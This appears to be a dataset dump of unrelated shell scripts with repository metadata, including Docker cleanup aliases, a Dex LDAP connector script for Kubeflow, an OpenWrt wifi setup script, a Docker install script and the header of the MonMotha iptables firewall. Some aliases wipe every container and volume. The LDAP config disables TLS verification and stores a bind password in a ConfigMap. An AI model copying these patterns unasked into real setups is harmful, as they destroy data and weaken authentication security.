alias dkrmui='docker images -q -f dangling=true | xargs -r docker rmi' # DELETE ALL UNTAGGED DOCKER IMAGES
;;
esac
# CLEANUP.
alias docker-clean-all='docker container stop $(docker container ls -a -q) && docker system prune -a -f --volumes'
alias docker-clean-containers='docker container stop $(docker container ls -a -q) && docker container rm $(docker container ls -a -q)'
alias docker-clean-unused='docker system prune --all --force --volumes'
################################################################################
#
# GIT
#
################################################################################
alias gitdelete='git branch | egrep -v "(master|staging|develop|release_candidate\*)" | xargs git branch -D'
################################################################################
#
# MONGO DATABASE
#
################################################################################
alias startmongo="mongod --dbpath ~/data/db --fork --logpath /dev/null"
alias stopmongo="mongo admin --eval 'db.shutdownServer()' > /dev/null"
################################################################################
#
# MYSQL DATABASE
#
################################################################################
##
# MariaDB
##
#alias startmysql="brew services start mariadb"
#alias stopmysql="brew services stop mariadb"
##
# MySQL
##
#alias startmysql="brew services start mysql"
#alias stopmysql="brew services stop mysql"
#alias restartmysql="brew services restart mysql"
##
# MySQL ( v5.7 )
##
alias startmysql="brew services start mysql@5.7"
alias stopmysql="brew services stop mysql@5.7"
alias restartmysql="brew services restart mysql@5.7"
################################################################################
#
# POSTGRESQL DATABASE
#
################################################################################
alias startpostgres="brew services start postgresql"
alias stoppostgres="brew services stop postgresql"
################################################################################
#
# MANAGING MULTIPLE AWS EKS CLUSTERS
#
################################################################################
alias eks-main-prod='export AWS_PROFILE=canvasprod && aws eks update-kubeconfig --name prod-eks && source <(kubectl completion bash)'
alias eks-main-int='export AWS_PROFILE=canvasprod && aws eks update-kubeconfig --name int-eks && source <(kubectl completion bash)'
alias eks-canvastest-int='export AWS_PROFILE=canvastest && aws eks update-kubeconfig --name int-eks && source <(kubectl completion bash)'
alias eks-canvastest-int-gc-dev='export AWS_PROFILE=canvastest && aws eks update-kubeconfig --name int-eks && source <(kubectl completion bash) && kubectl config set-context $(kubectl config current-context) --namespace gc-dev'
alias disco-aws='export AWS_PROFILE=gc-dev-disco';
# - - - - - - - - - - - - - - - - - - - -
# Code Editor + IDE
# - - - - - - - - - - - - - - - - - - - -
# Open ~/.bashrc for editing in VS Code (Insiders build).
alias change='code-insiders ~/.bashrc'
# Re-source ~/.bashrc to pick up new settings in the current session.
# NOTE(review): this silently overrides the `update` alias defined earlier
# in this file (the softwareupdate/brew/npm/gem one) -- rename one of them.
alias update='source ~/.bashrc'
| true
|
1ac17b6f63676fa345080194bf44e1180e68e532
|
Shell
|
SoeldnerConsult/kubeflow-in-tkg-cluster
|
/install_script_files/ldap_connector_configuration_script.sh
|
UTF-8
| 1,249
| 3.21875
| 3
|
[] |
no_license
|
#!/usr/bin/env zsh
# Append an LDAP connector to the Dex config used by Kubeflow's auth stack
# and restart Dex so the change takes effect.
# Arguments:
#   1 host            2 bindDN          3 bindPW
#   4 username prompt 5 search base DN  6 username attr
#   7 id attr         8 email attr      9 name attr
function configure_dex_ldap_connector(){
host=$1
bindDN=$2
bindPW=$3
username_prompt=$4
baseDN=$5
username_attribute=$6
id_attribute=$7
email_attribute=$8
name_attribute=$9
#1. obtain actual auth config
kubectl get configmap dex -n auth -o jsonpath='{.data.config\.yaml}' > dex-config.yaml
#2. create new auth -- append the LDAP connector block to the dumped config
cat << EOF >> dex-config.yaml
connectors:
- type: ldap
id: ldap
name: LDAP
config:
host: "$host"
#This is the user which has read access to AD
bindDN: "$bindDN"
#This is the password for the above account
bindPW: "$bindPW"
#What the user is going to see in Kubeflow
insecureSkipVerify: true
usernamePrompt: "$username_prompt"
userSearch:
#Which AD/LDAP users may access Kubeflow
baseDN: "$baseDN"
#This is the mapping I've talked about and I'll explain again
username: "$username_attribute"
idAttr: "$id_attribute"
emailAttr: "$email_attribute"
nameAttr: "$name_attribute"
EOF
#3 & 4 create dummy configmap and merge with actual
# NOTE(review): bare --dry-run is deprecated; recent kubectl requires
# --dry-run=client -- confirm the kubectl version in use.
kubectl create configmap dex \
--from-file=config.yaml=dex-config.yaml \
-n auth --dry-run -oyaml | kubectl apply -f -
#5 reapply auth
kubectl rollout restart deployment dex -n auth
}
| true
|
25f8811018a37107e83daabf319f86913ec5b220
|
Shell
|
jhbsz/wifi-handler
|
/connect-wifi
|
UTF-8
| 885
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/sh
# Copyright (C) 2014 Ripple Cloud
# Join an OpenWrt device to a wifi network as a client (sta): disable all
# existing wifi interfaces, add a fresh sta interface on the wan network,
# then commit and reload networking.
# params
ssid=$1
security=$2
password=$3
ifaceid=0
echo "$ssid"
echo "$security"
echo "$password"
# disable existing wifi interfaces
# Probe wifi-iface sections by index until `uci get` fails (no more).
while :; do
uci get wireless.@wifi-iface[$ifaceid] > /dev/null 2>&1
if [ $? = 0 ]; then
uci set wireless.@wifi-iface[$ifaceid].disabled=1
ifaceid=$(($ifaceid + 1))
else
break
fi
done
# add the new wifi-iface; @wifi-iface[-1] addresses the section just added
uci add wireless wifi-iface
uci set wireless.@wifi-iface[-1].device=radio0
uci set wireless.@wifi-iface[-1].network=wan
uci set wireless.@wifi-iface[-1].mode=sta
uci set wireless.@wifi-iface[-1].ssid=$ssid
uci set wireless.@wifi-iface[-1].encryption=$security
uci set wireless.@wifi-iface[-1].key=$password
# remove eth0 interface from wan
uci delete network.wan.ifname
# commit changes
uci commit
# reload network
ubus call network reload
/sbin/wifi down
/sbin/wifi up
| true
|
218e56fea57664545e4219f9b40121966a074be9
|
Shell
|
m4rcu5nl/docker-pdns-recursor-alpine
|
/tests/bats/01-pdns-recursor.bats
|
UTF-8
| 709
| 3.015625
| 3
|
[] |
no_license
|
#!/usr/bin/env bats
# Bats smoke tests for the pdns-recursor container.
# Expects PDNS_HOST and DOCKER_CONTAINER_NAME to be provided by the
# environment / test_helper.
setup(){
load test_helper
}
@test "Recursor answers to query over UDP" {
run dig +notcp +short @${PDNS_HOST} -t TXT test.localhost
[ "$status" -eq 0 ]
[ "$output" = '"Result"' ]
}
@test "Recursor answers to query over TCP" {
run dig +tcp +short @${PDNS_HOST} -t TXT test.localhost
[ "$status" -eq 0 ]
[ "$output" = '"Result"' ]
}
@test "Attempt to transfer zone fails" {
# AXFR must be refused; dig reports '; Transfer failed.' exactly once.
result="$(dig +tcp @${PDNS_HOST} AXFR www.m4rcu5.nl | grep -c '; Transfer failed.')"
[ "$result" -eq 1 ]
}
@test "Reload authorative and forwarded zones" {
run docker exec ${DOCKER_CONTAINER_NAME} rec_control reload-zones
[ "$status" -eq 0 ]
[ "$output" = "ok" ]
}
| true
|
8948a5ae8cd11b86723c28a6dcb58bef8ff20c80
|
Shell
|
jlagneau/git-submodules-to-subtree
|
/gitsmtost.sh
|
UTF-8
| 874
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Convert every git submodule listed in .gitmodules into a git subtree:
# deinit it, remove it from the index and worktree, commit the removal,
# add its upstream as a named remote, and re-import its history under the
# same prefix with `git subtree add --squash`.
#
# NOTE(review): assumes every submodule tracks `master` -- confirm before
# running on repos whose submodules use other default branches.
#
# Read path entries via git config rather than parsing .gitmodules by line
# position: the old parser used the submodule *name* from the section
# header as the path, which is wrong whenever name and path differ.
git config -f .gitmodules --get-regexp '^submodule\..*\.path$' |
while read -r key mpath; do
	# key looks like submodule.<name>.path; recover <name> and its url.
	name=${key#submodule.}
	name=${name%.path}
	murl=$(git config -f .gitmodules --get "submodule.${name}.url")
	echo "converting ${name} (${mpath})"
	# deinit the module
	git submodule deinit "$mpath"
	# remove the module from git
	git rm -r --cached "$mpath"
	# remove the module from the filesystem
	rm -rf "$mpath"
	# commit the change
	git commit -m "Removed $mpath submodule"
	# add the remote (-f also fetches it)
	git remote add -f "$name" "$murl"
	# add the subtree
	git subtree add --prefix "$mpath" "$name" master --squash
done
git rm .gitmodules
| true
|
ac8f2badb83d737231e53a32cd1fc3bbafae51a6
|
Shell
|
dronemill/harmony-api
|
/dockerfile_fs/etc/my_init.d/uid.sh
|
UTF-8
| 651
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# http://chapeau.freevariable.com/2014/08/docker-uid.html
#
# Re-map the container user $EXEC_UNAME to the UID/GID supplied in
# $EXEC_UID/$EXEC_GID (typically the host user's IDs) so files written to
# bind mounts end up owned by the host user.
# If we don't have a UID to switch to, there is nothing to do.
if [ -z "$EXEC_UID" ]; then exit; fi;
# Look up the user's passwd entry.  Anchor the match so a name that merely
# appears inside another line (GECOS field, substring of another username)
# is not picked up.
export ORIGPASSWD=$(grep "^${EXEC_UNAME}:" /etc/passwd)
export ORIG_UID=$(echo "$ORIGPASSWD" | cut -f3 -d:)
export ORIG_GID=$(echo "$ORIGPASSWD" | cut -f4 -d:)
# Fall back to the existing IDs when the caller supplied only one of them.
export EXEC_UID=${EXEC_UID:=$ORIG_UID}
export EXEC_GID=${EXEC_GID:=$ORIG_GID}
ORIG_HOME=$(echo "$ORIGPASSWD" | cut -f6 -d:)
# Rewrite the UID:GID pair in passwd and the GID in group.
# NOTE(review): a plain substitution could also hit another account sharing
# the same ":UID:GID:" pair -- acceptable in single-user containers.
sed -i -e "s/:${ORIG_UID}:${ORIG_GID}:/:${EXEC_UID}:${EXEC_GID}:/" /etc/passwd
sed -i -e "s/${EXEC_UNAME}:x:${ORIG_GID}:/${EXEC_UNAME}:x:${EXEC_GID}:/" /etc/group
chown -R "${EXEC_UID}:${EXEC_GID}" "${ORIG_HOME}"
| true
|
411f5db325b17266a44b5fc31bf885a9caf91166
|
Shell
|
o1-labs/graphql_ppx
|
/bzl/tools/wss
|
UTF-8
| 363
| 3.46875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# wss: list the contents of an external repository inside bazel's output
# base.  Usage: wss [ls-options] [external-repo-name]
# NOTE(review): uses [[ ]] and `ls --color` under #!/bin/sh -- only works
# where /bin/sh is bash and ls is GNU ls; confirm the target platforms.
# Idiom: iterate the positional params so LAST ends up holding the final one.
for LAST; do true; done
ARGS=
# Collect every argument except the last into ARGS (the last is the
# candidate repo name).
for param in "$@"
do
echo COUNT: $#
if [ $# -ne 1 ]
then
ARGS="$ARGS $1"
fi
shift
done
# if no dir arg is passed:
# (the "last" argument was really an option, so push it back into ARGS)
if [[ $LAST == -* ]]
then
ARGS="$ARGS $LAST"
LAST=
fi
ls --color $ARGS `bazel info output_base`/external/$LAST
echo OUTPUT_BASE: `bazel info output_base`/external/$LAST
| true
|
3271d8359c63bf9a29430fe6981f7344a03faad8
|
Shell
|
sotoiwa/vagrant-was-centos
|
/unzip_repo.sh
|
UTF-8
| 627
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# Unpack the IBM Installation Manager / WebSphere repository archives from
# the Vagrant shared folder into per-repository directories under /work.
set -eu
set -o pipefail
# unziprepo VARNAME
#   VARNAME names a variable holding a zip file name.  The archive is
#   copied from /vagrant into /work/VARNAME and extracted there.
function unziprepo () {
local repo=$1
# Indirect expansion: resolve e.g. "IIM" to the value of $IIM.
local filename=${!repo}
mkdir -p "/work/${repo}"
cd "/work/${repo}"
cp "/vagrant/${filename}" .
unzip -q "${filename}"
}
IIM=agent.installer.linux.gtk.x86_64_1.8.9004.20190423_2015.zip
WAS=WAS_ND_V9.0_MP_ML.zip
JDK=sdk.repo.8030.java8.linux.zip
IHS=was.repo.9000.ihs.zip
PLG=was.repo.9000.plugins.zip
WAS_FP=9.0.0-WS-WAS-FP011.zip
JDK_FP=ibm-java-sdk-8.0-5.35-linux-x64-installmgr.zip
IHSPLG_FP=9.0.0-WS-IHSPLG-FP011.zip
unziprepo IIM
unziprepo WAS
unziprepo JDK
unziprepo IHS
unziprepo PLG
unziprepo WAS_FP
unziprepo JDK_FP
unziprepo IHSPLG_FP
| true
|
56df9ba41b8d65b305aaa7f3133534e0947ca8d8
|
Shell
|
Zo3i/OCS
|
/docker/dockerInstall.sh
|
UTF-8
| 1,219
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Install Docker CE + docker-compose on CentOS 7 using the Aliyun mirrors.
### Update the system ###
yum -y update
### Install docker ###
# Install required system tools
sudo yum install -y yum-utils device-mapper-persistent-data lvm2
# Add the docker-ce repository (Aliyun mirror)
sudo yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo
# Refresh the yum cache
sudo yum makecache fast
# Install Docker CE
sudo yum -y install docker-ce
# Start docker and enable it at boot (CentOS 7 / systemd)
systemctl start docker.service
systemctl enable docker.service
# Point the docker registry at the China mirror
echo '{"registry-mirrors": ["https://registry.docker-cn.com"],"live-restore": true}' > /etc/docker/daemon.json
systemctl restart docker
# Install docker-compose
sudo curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
# Install bash command completion for docker-compose
yum -y install bash-completion
curl -L https://raw.githubusercontent.com/docker/compose/$(docker-compose version --short)/contrib/completion/bash/docker-compose > /etc/bash_completion.d/docker-compose
### End of docker installation ###
### Grant the current user access to docker ###
sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart
| true
|
6177d3085ca14bc0b17afce37fcd880f821fd05c
|
Shell
|
kevyin/ngsane
|
/mods/old/dindelMerge.sh
|
UTF-8
| 2,908
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Script running dindel on a bam file containing the reads from several individuals
# It requires the candidate indels from a prior dindel run on the bamfiles for each
# individual seperately.
# author: Denis C. Bauer
# date: Jan.2011
#INPUTS
NGSANE_BASE=$1 # location of the NGSANE repository
FILE=$2 # bam files
CANDIDATES=$3 # candidate regions from the seperate run
FASTA=$4 # reference genome
OUT=$5 # output dir
#PROGRAMS
. ${NGSANE_BASE}/conf/header.sh
#PARAMETERS
WINDOWS=1000
echo ">>>>> indel calling with DINDEL simultaneously"
echo ">>>>> startdate "`date`
echo ">>>>> dindelMerge.sh $NGSANE_BASE $FILE $CANDIDATES $FASTA $OUT"
# delete privious output files
if [ -e $OUT/genotype.dindel.vcf ]; then
rm $OUT/genotype.dindel.vcf
fi
# make dir
if [ ! -d $OUT/dindelWindow ]; then
mkdir $OUT/dindelWindow
fi
# NOTE(review): hard-coded number of samples used in the merge step below --
# confirm it matches the pooled bam file.
samp=12
# get library size
echo "********* get library size"
$DINDELHOME/binaries/dindel-1.01-linux-64bit --analysis getCIGARindels --bamFile $FILE \
--outputFile $FILE.dindel --ref $FASTA --maxRead 100000 #--region 229994688-230071581 --tid chr1
# #combine the variants from the previous run
# cat $FILE.dindel.variants.txt $CANDIDATES > $FILE.dindel.ext.variants.txt
# make windows
echo "********* make windows"
$DINDELHOME/dindel-1.01-python/makeWindows.py \
--inputVarFile $FILE.dindel.variants.txt \
--windowFilePrefix $OUT/dindelWindow/genotype.realWind \
--numWindowsPerFile $WINDOWS
#get indels
#
#@Kees: this is where the problem occurs
echo "********* get indels"
# Run the pooled indel analysis once per window file produced above.
for i in $( ls $OUT/dindelWindow/genotype.realWind* )
do
echo "prozess $i"
$DINDELHOME/binaries/dindel-1.01-linux-64bit --analysis indels --doPooled \
--bamFile $FILE --ref $FASTA --quiet --maxRead 100000 \
--varFile $FILE.dindel.libraries.txt \
--libFile $OUT/ \
--outputFile ${i/realWind/stage2_realWind}
done
ls $OUT/dindelWindow/genotype*.glf.txt > $OUT/dindelWindow/genotype.stage2.outputfiles.txt
# NOTE(review): this bare `exit` makes everything below unreachable --
# presumably left in while debugging the stage above; confirm before
# removing it.
exit
# merge into a VCF file
echo "********* merge"
$DINDELHOME/dindel-1.01-python/mergeOutputPooled.py --numSamples $samp --numBAMFiles $samp \
--inputFiles $OUT/dindelWindow/genotype.stage2.outputfiles.txt\
--outputFile $OUT/genotype.dindel.vcf --ref $FASTA
# get individual genotypes
echo "********* get individual genotypelikelyhoods"
# NOTE(review): $FILES below is never assigned in this script -- probably a
# typo for $FILE; also $i leaks from the loop above.
$DINDELHOME/dindel-1.01-python/makeGenotypeLikelihoodFilePooled.py \
--inputGLFFiles ${i/realWind/stage2_realWind} \
--callFile $OUT/genotype.dindel.vcf \
--bamFiles $FILES \
--outputFile $OUT/genotype.dindel.glf
#clean up
#rm $OUT/genotype.dindel.variants.txt
#rm $OUT/genotype.dindel.libraries.txt
#rm $OUT/dindelWindow/genotype.stage2"_"realWind.*
#rm $OUT/dindelWindow/genotype.realWind*
#rm $OUT/dindelWindow/genotype".staget2.outputfiles.txt"
#rm bamFilePaths.txt
echo ">>>>> indel calling with DINDEL - FINISHED"
echo ">>>>> enddate "`date`
| true
|
a764d999e669d3a5d3fdc15b5d26fb4aa974386d
|
Shell
|
williamhbell/BashIntro
|
/bin/example_04.sh
|
UTF-8
| 247
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# W. H. Bell
# A program to demonstrate while and until loops
#
# NOTE(review): the original conditions were [[ $i<$nloops ]] with no
# spaces around "<".  Inside [[ ]] that is a single non-empty word, which
# is always true, so the while loop never terminated and the until loop
# body never ran.  Arithmetic evaluation (( ... )) compares numerically.
nloops=3
i=0
echo "while loop"
while (( i < nloops )); do
  echo $i
  i=$((i + 1))
done
echo
echo "until loop"
i=0
until (( i > nloops )); do
  echo $i
  i=$((i + 1))
done
| true
|
98ca8c3fa8f7afa1dcfa6293c3efcfe27902b27c
|
Shell
|
whit2333/bubble_chamber
|
/bin/run_bubble_sim
|
UTF-8
| 355
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
# Run the bubble_chamber simulation, forwarding any lines piped on stdin
# (macro commands) plus all command-line arguments.
piped_args=
# -p /dev/stdin: true only when stdin is a pipe (i.e. something was piped in).
if [ -p /dev/stdin ]; then
# If we want to read the input line by line
while IFS= read line; do
echo "Line: ${line}"
# Accumulate the piped lines joined with literal "\n" sequences; the
# `echo -e` at the bottom turns them back into real newlines.
if [ -z "$piped_args" ]; then
piped_args="${line}"
else
piped_args="${piped_args}\n${line}"
fi
done
fi
source /usr/local/bin/geant4.sh
echo -e ${piped_args} | bubble_chamber $@
| true
|
022e7de983280fdcb31538507369477b132a1e20
|
Shell
|
henrysher/fedora-infra-ansible
|
/roles/people/files/grab-daily-logs.sh
|
UTF-8
| 993
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
# skvidal - 2013-06-25
# Extract yesterday's fedorapeople access-log lines matching a pattern into
# a per-project accesslogs directory readable by apache.
# takes 2 args: grep_search_string subdir_to_write_to
# ex: bash grab-daily-logs.sh /repos/openstack/ rdo
logpath='/var/log/httpd/'
basedest="/srv/people/site/accesslogs/"
logfn='fedorapeople.org-access.log'
search="$1"
destpath="$basedest/$2"
dstamp=$(date -d yesterday +%Y-%m-%d)
# Create the shared base directory on first run.
if [ ! -d "$basedest" ]; then
    mkdir -p "$basedest"
    chown apache:apache "$basedest"
    chmod 770 "$basedest"
fi
# Make sure there is an index.html one level up so the tree can't be listed.
if [ ! -f "$basedest/index.html" ]; then
    echo "nothing to see" > "$basedest/index.html"
    chmod 664 "$basedest/index.html"
fi
# Per-project destination directory.
if [ ! -d "$destpath" ]; then
    mkdir -p "$destpath"
    chown apache:apache "$destpath"
    chmod 770 "$destpath"
fi
# Grab the matching lines from yesterday's log.  Quote the pattern so
# spaces survive, and use -- so a leading "-" is not parsed as an option.
grep -- "$search" "$logpath/${logfn}-${dstamp}" >> "${destpath}/${dstamp}.log"
chown apache:apache "$destpath/${dstamp}.log"
chmod 640 "$destpath/${dstamp}.log"
# Expire logs older than 720 hours (30 days).
/usr/sbin/tmpwatch -f 720 -m "$destpath"
| true
|
abe575e131896c42c45e25bc02c0981351dea354
|
Shell
|
z3an/cifs-samba4.5.1
|
/build.sh
|
UTF-8
| 229
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
# Build helper: ensures a clean ./dist, then delegates to scripts/build-image.
# Usage: build.sh [--push]   (--push skips the dist cleanup and publishes)
set -e
# Run from the script's own directory so relative paths work regardless of
# the caller's CWD; quoting keeps paths containing spaces intact.
cd "$(dirname -- "$0")"
DO_PUSH="$1"
if [ "${DO_PUSH}" != "--push" ]; then
if [ ! -e ./dist ]; then
mkdir -p ./dist
fi
rm -rf ./dist/*
fi
# Forward --push only when it was given; ${VAR:+...} expands to nothing for
# an empty value, so no spurious empty argument is passed (quoting $DO_PUSH
# directly would have changed the no-argument case).
./scripts/build-image ${DO_PUSH:+"$DO_PUSH"}
| true
|
22e1f8fee8e8361c2e6d536acf724c18dc4d22ee
|
Shell
|
HoweyHuo/UbuntuSetupResources
|
/rc.firewall/rc.firewall
|
ISO-8859-2
| 57,135
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# -- 435 ---------------------------------------------------------------|
# This is it...MonMotha's Firewall 2.3.8-pre9! |
# I wrote a firewall and all I got was this cheesy tagline |
# ----------------------------------------------------------------------|
# 2.3 RELEASE NOTES: This is the 2.2 series with some extra stuff, |
# including MAC address matching, stateful matching, port forwarding, |
# per-proto accept behavior, and some other stuff that I might think |
# about adding later. |
# ----------------------------------------------------------------------|
# COMMENTS from MonMotha: |
# |
# Please do not email me directly with usage questions. I don't have |
# the time or resources to keep up. Check the configuration help at |
# the URL posted below then post to the users list if you have any |
# further questions. |
# --MonMotha |
# |
# When emailing me or the mailing lists, keep in mind that HTML email |
# may be silently rejected as an anti-spam measure. Configure your UA |
# to use plain text for mail. |
# --MonMotha |
# |
# A list of known bugs can be found at: |
# http://www.mplug.org/phpwiki/index.php?MonMothaKnownBugs |
# please check this list before reporting bugs. Bugs can be reported |
# directly to me or to the devel mailing list. Please ask to be CCed |
# if you mail the devel list and are not a member. |
# --MonMotha |
# |
# Mailing lists are now available. See the distribution website at |
# <http://monmotha.mplug.org> for more info. |
# --MonMotha |
# |
# Note another change of my email address. New address is: |
# <monmotha@indy.rr.com>. Hopefully I can keep this one for a while. |
# --MonMotha |
# |
# I will be entering "feature freeze" when 2.3.8 goes final. Please |
# make sure to have any patches or feature requests in by then. |
# I expect 2.3.7 to be closing in on deserving the "stable" marking. |
# --MonMotha |
# |
# Please note the change of my e-mail address. The new address is: |
# obi-wan@starwarsfan.com. The old address (bvmopen@usa.net) will be |
# discontinued as of July 31, 2001. |
# --MonMotha |
# |
# When e-mailing to report a bug, please check first that it has not |
# already been fixed in the next prerelease (which can be found at the |
# distribution site). |
# --MonMotha |
# |
# Before e-mailing me, please check the distribution site (which can be |
# found at http://freshmeat.net/projects/mothafirewall as it changes |
# sometimes) for a new version. |
# --MonMotha |
# |
# Please...PLEASE give me feedback on your experiences with this script |
# I would really like to know what everyone wants, what works, and |
# about the inevitable bugs present in anything. |
# |
# Direct all feedback to: monmotha@indy.rr.com |
# --MonMotha |
# |
# When e-mailing with problems, please include firewall script version, |
# iptables version, kernel version, and GNU BASH version. If you think |
# your problem might be related to kernel configuration, please attach |
# the .config file for your kernel. |
# --MonMotha |
# |
# ----------------------------------------------------------------------|
# SYSTEM REQUIREMENTS: You must have either compiled the appropriate |
# iptables support into your 2.4 kernel or have loaded all the |
# applicable modules BEFORE you run this script. This script will not |
# load modules for you. |
# |
# You will need (at least) the following kernel options to use |
# this firewall: CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, |
# CONFIG_IP_NF_FILTER, CONFIG_IP_NF_MATCH_STATE and |
# CONFIG_IP_NF_TARGET_REJECT. |
# To use the masquerading you will also need (at least): |
# CONFIG_IP_NF_CONNTRACK, CONFIG_IP_NF_NAT, CONFIG_IP_NF_NAT_NEEDED |
# and CONFIG_IP_NF_TARGET_MASQUERADE. |
# Additional options may be needed to use other features. |
# |
# You need iptables. Get it at "http://netfilter.filewatcher.org". |
# Some of the features will need patches only present in the CVS |
# |
# This script was written (and partially tested) with iptables CVS |
# and kernel 2.4.x (non testing) in mind. |
# |
# Also, this is a BASH shell script...any 2.x version of GNU BASH |
# should work. |
# ----------------------------------------------------------------------|
# |
# ALL USERS, READ THE FOLLOWING: |
# |
# This is distributed under the BSD liscense sans advertising clause: |
# |
# Redistribution and use in source and binary forms, with or without |
# modification, are permitted provided that the following conditions |
# are met: |
# |
# 1.Redistributions of source code must retain the above copyright |
# notice, this list of conditions and the following disclaimer. |
# 2.Redistributions in binary form must reproduce the above |
# copyright notice, this list of conditions and the following |
# disclaimer in the documentation and/or other materials provided |
# with the distribution. |
# 3.The name of the author may not be used to endorse or promote |
# products derived from this software without specific prior |
# written permission. |
# |
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR |
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED |
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE |
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY |
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL |
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE |
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS |
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER |
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR |
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN |
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE |
# |
# While this may be used freely for commercial use, I do REQUEST that |
# any commercial users please tell me via e-mail at |
# monmotha@indy.rr.com that they are using it, why they chose it, |
# how well it works, etc. |
# |
# ----------------------------------------------------------------------|
# IMPORTANT: This firewall is currently in beta! It may be too |
# restrictive or insecure. |
# ----------------------------------------------------------------------|
# CHANGELOG: (Since 2.3.0-pre1a only) |
# version 2.3.8-pre9: Correct typo in config help wiki |
# Re-order FILTER_CHAINS for TREJECT change |
# rp_filter support multiple INET interfaces |
# version 2.3.8-pre8: Fix typo in ULREJECT chain creation status |
# Remove one-liner config help - use wiki |
# version 2.3.8-pre8b: Show liscense on unconfigured run |
# Experimental multiple internet devices |
# -Breakage of DMZ guaranteed |
# version 2.3.8-pre8a: LTREJECT jump to TREJECT after logging |
# Fix transparent proxy when on masqed LAN; |
# See discussion list archives for Jun |
# 2002 for more info |
# Clarify source route messages |
# version 2.3.8-pre7: Fix syntax error in ALLOW_HOSTWISE_PROTO |
# version 2.3.8-pre7b: More sanity checking |
# LOCIP option for DENY_HOSTWISE options |
# LOCIP option for DENY_ALL |
# version 2.3.8-pre7a: Clarify liscense |
# Alias TCP_ALLOW and UDP_ALLOW to |
# ALLOW_HOSTWISE_xxx as they contain |
# redundant code |
# Move BAD_ICMP to non-experimental options |
# Changed exit status; review your scripts |
# Additional sanity checking |
# Add ALLOW_HOSTWISE_PROTO option |
# version 2.3.8-pre6: Fix comment errors |
# Fix a bug in config checks |
# Add BRAINDEAD_ISP option |
# version 2.3.8-pre5: More fixes for multiple LAN interfaces |
# Fix a syntax error in ALLOW_HOSTWISE_TCP |
# version 2.3.8-pre5d: Intersubnet Routing should work again |
# TOS Mangles default to off |
# version 2.3.8-pre5c: Port forwards apply to all interfaces only |
# when LOCIP is used |
# Multiple LAN Interfaces (breaks DMZ) |
# version 2.3.8-pre5b: Fix missing fi near line 1160 |
# version 2.3.8-pre5a: Fix BAD_ICMP and echo-request |
# Fix port forwards |
# Add checks for limit and REJECT |
# Local IP options for TCP/UDP allows (and |
# hostwise allows) |
# Port forwards now apply to all interfaces |
# Remove redundant disclaimer |
# version 2.3.8-pre4: Fix typo in SUPER_EXEMPT |
# Fix reversal of DMZIN/OUT |
# Fix reversed logic in port forwards |
# version 2.3.8-pre3: Fix DHCP server syntax error |
# Replace ALLOW_ALL with SUPER_EXEMPT |
# Fix ALLOW_OUT_TCP |
# Fix SNAT status reporting |
# Removed some obsoleted code |
# Move DHCP server to stable options |
# Add local IP to port forwards |
# version 2.3.8-pre2: Don't create ULDROP unless used in case |
# system doesn't have ULOG support |
# ALLOW_OUT_TCP now allows a destination port |
# Additional sanity checks |
# Add ULREJECT and ULTREJECT targets |
# BLACKHOLEs should now work |
# Fix status reporting in local traffic rules |
# DMZ Fixes (Hans Bieshaar) |
# Flush and delete SYSTEST (Hans) |
# Syncookies set off if not on (Hans) |
# Fix REJECT messages for ICMP (Hans) |
# Explicit denies are now global (Hans) |
# Remove FORWARD -d $INTERNAL_LAN; it is not |
# needed for internet and can pose a |
# security risk (this may break things) |
# (Hans) |
# SYNCOOKIES default to off (Hans) |
# We had a debate on this one, feel free |
# to email me regarding it. |
# Config directives for RP_FILTER and |
# accept strict source routed (Hans) |
# Add BAD_ICMP directive |
# version 2.3.8-pre1: Add ULDROP (ULOG and DROP) target |
# Restructuring to allow the following: |
# BLACKHOLEs are now global (not just inet) |
# All explicit denies override TCP/UDP |
# forwards. |
# All explicit denies ovrride ALLOW_HOSTWISE |
# BLACKHOLEs should now work for computers |
# behind the firewall as well as the |
# firewall itself. |
# Fix for iptables 1.2.3 log level info |
# version 2.3.7: No changes from pre8 |
# version 2.3.7-pre8: Change email address on liscense |
# Revert to pre6 behavior of dropping ICMP |
# echo-request (take global DROP= policy) |
# Allow everything from interface lo |
# Correct pre7 changelog |
# Special rules for DHCP servers |
# version 2.3.7-pre7: Fix version number in changelog entry below |
# Fix 127.0.0.1 INPUT handling. |
# Only enable IP forwarding if it's needed |
# (INTERNAL_LAN defined) |
# Tweak flood parameters |
# Hostwise allows now override explicit, |
# denies but not blackholes |
# ICMP echo-request will no longer take the |
# specified drop policy when it doesn't |
# comply with limits, straight DROP will |
# be used instead |
# Fix REJECT handling in TREJECT and LTREJECT |
# Add transparent proxy support (Joshua Link) |
# version 2.3.7-pre6: Fix status reporting on SSR SysCtl loop |
